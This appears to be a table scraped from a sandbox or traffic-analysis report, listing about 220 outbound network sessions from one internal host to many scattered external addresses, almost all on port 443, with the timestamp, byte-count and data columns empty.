                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11266192.168.2.2342570160.199.227.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11267192.168.2.2350962100.147.145.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11268192.168.2.2359796169.114.120.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11269192.168.2.236013814.174.238.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11270192.168.2.2339486160.172.223.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11271192.168.2.235628474.82.1.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11272192.168.2.2341544126.144.10.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11273192.168.2.2339656171.20.182.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11274192.168.2.2333242125.13.62.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11275192.168.2.2333826124.43.172.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11276192.168.2.2343992156.214.26.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11277192.168.2.2333122211.181.158.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11278192.168.2.2345658120.68.53.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11279192.168.2.2354844191.82.127.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11280192.168.2.233493041.63.61.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11281192.168.2.235232862.24.128.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11282192.168.2.235615297.29.72.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11283192.168.2.2359540119.71.177.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11284192.168.2.2352356134.102.26.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11285192.168.2.233918698.2.0.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11286192.168.2.2348736171.198.198.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11287192.168.2.234415860.169.77.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11288192.168.2.235136873.103.136.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11289192.168.2.233813898.54.110.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11290192.168.2.2354600161.116.252.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11291192.168.2.2332782184.117.50.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11292192.168.2.234593214.114.192.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11293192.168.2.23570304.52.132.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11294192.168.2.2350402204.106.173.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11295192.168.2.2346444123.91.213.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11296192.168.2.234333493.100.127.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11297192.168.2.235531419.1.159.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11298192.168.2.2337450161.69.61.668080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11299192.168.2.234388642.237.128.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11300192.168.2.235979812.119.15.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11301192.168.2.2342924146.250.165.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11302192.168.2.233550843.241.212.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11303192.168.2.2357694111.207.165.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11304192.168.2.233793276.139.96.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11305192.168.2.2335236217.44.176.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11306192.168.2.2346976163.252.96.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11307192.168.2.235452664.204.201.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11308192.168.2.2343156124.37.218.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11309192.168.2.2333040135.94.131.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11310192.168.2.235802058.207.247.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11311192.168.2.2360660145.52.131.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11312192.168.2.235745659.236.95.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11313192.168.2.2344522161.228.235.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11314192.168.2.2336264193.66.244.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11315192.168.2.2351742163.93.44.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11316192.168.2.2336874159.38.78.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11317192.168.2.2344182152.70.238.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11318192.168.2.2334944196.255.118.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11319192.168.2.233600874.112.150.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11320192.168.2.2360442205.8.115.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11321192.168.2.2334652169.9.40.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11322192.168.2.2356918142.49.230.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11323192.168.2.235432274.112.110.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11324192.168.2.2346998155.27.169.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11325192.168.2.2352042113.184.204.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11326192.168.2.2345588199.207.162.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11327192.168.2.2357378104.70.141.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11328192.168.2.2351384171.171.188.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11329192.168.2.2339168200.27.141.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11330192.168.2.235289496.127.212.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11331192.168.2.2351240190.68.161.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11332192.168.2.2332844186.205.164.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11333192.168.2.235523639.248.109.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11334192.168.2.235379634.164.130.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11335192.168.2.235067892.156.22.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11336192.168.2.2350690171.246.158.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11337192.168.2.234827683.14.241.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11338192.168.2.235189237.188.72.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11339192.168.2.233446698.35.205.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11340192.168.2.2347000108.126.22.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11341192.168.2.2338690216.193.146.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11342192.168.2.2355714208.219.219.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11343192.168.2.235371823.208.142.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11344192.168.2.236033818.88.140.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11345192.168.2.2360388109.174.78.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11346192.168.2.235720217.20.92.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11347192.168.2.2349264145.1.132.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11348192.168.2.2352236155.111.181.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11349192.168.2.2353922217.204.201.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11350192.168.2.2355590150.31.112.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11351192.168.2.234637861.205.66.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11352192.168.2.234811212.60.17.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11353192.168.2.2336588128.191.79.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11354192.168.2.233889077.253.145.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11355192.168.2.2348504193.236.161.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11356192.168.2.235527890.146.71.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11357192.168.2.2347108128.54.85.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11358192.168.2.2344420217.163.61.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11359192.168.2.2335418217.24.13.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11360192.168.2.234895612.77.58.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11361192.168.2.235539063.161.122.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11362192.168.2.233942058.198.68.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11363192.168.2.233940076.165.117.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11364192.168.2.2357796179.249.251.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11365192.168.2.236098443.162.173.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11366192.168.2.2360022190.76.93.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11367192.168.2.2343716145.133.24.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11368192.168.2.2341344136.33.66.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11369192.168.2.235342095.148.151.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11370192.168.2.234007819.177.160.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11371192.168.2.2342910117.119.21.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11372192.168.2.235402078.130.248.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11373192.168.2.2349336123.245.36.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11374192.168.2.235433691.177.1.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11375192.168.2.2342534223.72.24.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11376192.168.2.2347284197.167.140.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11377192.168.2.2336390172.237.12.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11378192.168.2.233494264.255.129.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11379192.168.2.2343538218.255.162.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11380192.168.2.2343544152.253.207.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11381192.168.2.2346738187.79.181.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11382192.168.2.235665451.89.71.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11383192.168.2.2339534106.218.53.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11384192.168.2.2345390187.90.183.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11385192.168.2.2355968162.222.19.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11386192.168.2.235166675.146.74.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11387192.168.2.233776690.62.45.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11388192.168.2.235813831.49.16.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11389192.168.2.2352314137.105.99.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11390192.168.2.234539825.72.115.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11391192.168.2.2351200128.141.26.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11392192.168.2.2353328154.45.110.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11393192.168.2.2338152141.152.155.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11394192.168.2.233608444.241.105.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11395192.168.2.2339854114.226.83.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11396192.168.2.2350862166.57.162.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11397192.168.2.234984635.110.155.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11398192.168.2.234755077.232.23.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11399192.168.2.234867638.119.46.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11400192.168.2.233816896.72.176.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11401192.168.2.2344772206.140.110.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11402192.168.2.2354160159.135.190.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11403192.168.2.2338862201.43.134.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11404192.168.2.2353192141.131.87.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11405192.168.2.2349436180.120.201.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11406192.168.2.233796814.208.150.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11407192.168.2.235497048.196.189.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11408192.168.2.234485840.14.119.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11409192.168.2.234889293.87.221.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11410192.168.2.234907257.51.93.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11411192.168.2.233569053.26.79.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11412192.168.2.2341928192.50.191.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11413192.168.2.233339899.182.210.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11414192.168.2.2343200195.16.197.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11415192.168.2.2359250146.141.21.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11416192.168.2.2351036193.5.190.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11417192.168.2.2351310145.13.244.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11418192.168.2.234935836.232.169.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11419192.168.2.2358014114.102.68.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11420192.168.2.234388251.211.153.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11421192.168.2.234868813.144.235.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11422192.168.2.236061469.195.48.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11423192.168.2.2343382172.79.125.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11424192.168.2.2340446223.197.230.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11425192.168.2.23581129.49.27.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11426192.168.2.236001694.241.161.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11427192.168.2.2355644182.40.94.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11428192.168.2.2337288205.252.108.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11429192.168.2.234833632.63.120.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11430192.168.2.236067642.165.207.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11431192.168.2.2346490157.243.115.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11432192.168.2.2352500145.96.228.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11433192.168.2.2341636103.49.60.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11434192.168.2.2351624146.65.126.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11435192.168.2.2334370155.31.59.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11436192.168.2.2336132145.250.200.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11437192.168.2.235849840.127.74.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11438192.168.2.23479282.94.93.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11439192.168.2.2345194124.62.106.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11440192.168.2.2337222192.223.28.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11441192.168.2.2340736134.29.14.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11442192.168.2.2356940102.71.191.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11443192.168.2.2360640198.183.87.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11444192.168.2.2343382211.83.200.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11445192.168.2.2334524163.18.133.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11446192.168.2.2346368116.54.46.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11447192.168.2.2347920219.14.248.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11448192.168.2.2349812218.106.166.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11449192.168.2.2359666212.88.172.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11450192.168.2.234466295.37.1.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11451192.168.2.235676860.190.154.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11452192.168.2.235118878.71.52.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11453192.168.2.2355478187.109.35.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11454192.168.2.2348590181.33.220.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11455192.168.2.2338022195.7.102.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11456192.168.2.2347984134.66.97.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11457192.168.2.234752257.133.183.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11458192.168.2.235570887.110.245.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11459192.168.2.2342270168.47.120.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11460192.168.2.235662094.46.190.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11461192.168.2.234561267.171.200.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11462192.168.2.234933868.234.243.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11463192.168.2.2346026145.28.137.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11464192.168.2.234367617.57.44.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11465192.168.2.2333974134.254.127.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11466192.168.2.235273692.69.252.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11467192.168.2.2349084187.93.215.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11468192.168.2.2334194154.43.249.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11469192.168.2.235638434.12.47.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11470192.168.2.233753694.229.165.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11471192.168.2.2342282175.26.178.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11472192.168.2.234281634.191.55.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11473192.168.2.233332444.162.121.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11474192.168.2.2337306162.102.40.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11475192.168.2.236071276.176.1.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11476192.168.2.233490031.14.76.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11477192.168.2.2334070157.154.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11478192.168.2.2346190143.248.107.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11479192.168.2.233912486.160.163.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11480192.168.2.2355890159.207.202.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11481192.168.2.23397881.164.4.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11482192.168.2.2350178169.137.193.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11483192.168.2.2352868120.130.181.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11484192.168.2.233445052.105.125.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11485192.168.2.2346334186.204.158.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11486192.168.2.2338844113.54.193.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11487192.168.2.235890089.228.146.101443
